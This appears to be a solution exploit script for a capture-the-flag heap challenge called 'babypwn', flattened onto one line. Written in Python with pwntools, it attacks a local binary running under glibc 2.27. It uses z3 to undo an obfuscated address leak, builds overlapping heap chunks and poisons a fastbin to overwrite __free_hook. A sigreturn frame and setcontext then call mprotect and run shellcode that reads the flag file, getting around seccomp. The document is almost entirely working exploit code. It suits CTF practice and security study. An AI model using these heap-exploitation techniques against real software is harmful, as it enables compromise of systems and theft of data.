babypwn
exp
from pwn import * from z3 import * context.log_level=‘debug‘ p=process(["/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/ld-2.27.so","./babypwn"],env={‘LD_PRELOAD‘:‘/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc-2.27.so:./libseccomp.so.2‘}) #p=process(‘./babypwn‘) def add(size): p.sendlineafter(‘>>> \n‘,‘1‘) p.sendlineafter(‘size:\n‘,str(size)) def edit(index,content): p.sendlineafter(‘>>> \n‘,‘3‘) p.sendlineafter(‘index:\n‘,str(index)) p.sendlineafter(‘content:\n‘,content) def free(index): p.sendlineafter(‘>>> \n‘,‘2‘) p.sendlineafter(‘index:\n‘,str(index)) def show(index): p.sendlineafter(‘>>> \n‘,‘4‘) p.sendlineafter(‘index:\n‘,str(index)) def solve(target): a1=BitVec(‘a1‘,32) x=a1 for _ in range(2): x^= (32*x)^LShR((x^(32*x)),17)^(((32*x)^x^LShR((x^(32*x)),17))<<13) s=Solver() s.add(x==target) assert s.check()==sat return (s.model()[a1].as_long()) #leak libc_base add(0x1f0) add(0x200) for i in range(2,9): add(0x1f0) #pause() for i in range(2,9): free(i) free(0) for i in range(7): add(0x1f0) print i #pause() if i!=5: edit(i,(p64(0)+p64(0x21))*0x18) add(0xa0) show(8) libc=ELF(‘/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc-2.27.so‘) tmp1=solve(int(‘0x‘+p.recvline(keepends=False),16)) tmp2=solve(int(‘0x‘+p.recvline(keepends=False),16)) addr=(tmp2<<32)+tmp1 print hex(addr) base=addr-0x3ebe90 libc.address=base #leak heap_base add(0x140) free(8) free(9) show(5) tmp1=solve(int(‘0x‘+p.recvline(keepends=False),16)) tmp2=solve(int(‘0x‘+p.recvline(keepends=False),16)) addr=(tmp2<<32)+tmp1 print hex(addr) heapbase=addr-0x12c0 gdb.attach(p) add(0xa0)#8 add(0x148)#9 addr=heapbase+0xcb0 edit(9,‘a‘*0x148) pause() py=p64(addr)*2 py=py.ljust(0x140,‘a‘)+p64(0x150+0xa0) edit(9,py) edit(8,p64(0)+p64(0x1f0)+p64(addr)*2) edit(1,‘a‘*0x1f0+p64(0)+p64(0x251)) pause() add(0x1f0) pause() free(0) for i in range(2,8): free(i) pause() free(1)#overlap free_hook=libc.sym[‘__free_hook‘] system=libc.sym[‘system‘] setcontext=libc.sym[‘setcontext‘]+53 mprotect=libc.sym[‘mprotect‘] pause() add(0x120)#0 add(0x140)#1 pause() free(1) free(9) pause() edit(0,‘./flag\x00\x00‘+‘a‘*152+p64(free_hook))#fastbin_attack pause() add(0x140)#1 add(0x140)#2 pause() context.arch=‘amd64‘ sig=SigreturnFrame() sig.rsp=free_hook+0x10 sig.rbp=sig.rsp sig.rip=mprotect sig.rdi=free_hook&0xfffffffffffff000 sig.rsi=0x1000 sig.rdx=7 sig.csgsfs=0x2b000000000033 edit(0,str(sig)) pause() shellcode=‘‘‘ mov rax,2 mov rdi,{sh} mov rsi,0 syscall xor rax,rax mov rdi,3 mov rsi,{bss1} mov rdx,0x300 syscall mov rax,1 mov rdi,1 mov rsi,{bss2} mov rdx,0x100 syscall ‘‘‘.format(sh=free_hook+0x78,bss1=free_hook-0x500,bss2=free_hook-0x500) shellcode=asm(shellcode) py=p64(setcontext)+‘flag\x00\x00\x00\x00‘+p64(free_hook+0x18)+shellcode py+=py.ljust(0x100,‘\x90‘) py+="flag\x00\x00\x00\x00" edit(2,py) pause() free(0) p.interactive()